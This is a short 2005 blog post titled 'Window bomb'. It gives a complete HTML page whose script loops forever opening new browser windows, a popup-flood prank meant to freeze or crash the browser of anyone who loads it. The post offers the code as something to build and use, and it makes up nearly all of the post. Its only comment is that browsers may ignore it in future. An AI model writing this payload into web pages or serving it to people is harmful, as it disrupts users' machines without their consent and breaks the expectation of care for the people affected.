Tuesday, November 08, 2005

Window bomb

Whip up your favorite text editor and start doing this.



<html>
<title>Window Bomb!</title>
<script language="javascript">
        while (true) {
        window.open()
}
</script>
</html>

Expecting browsers to ignore this in the future.

No comments: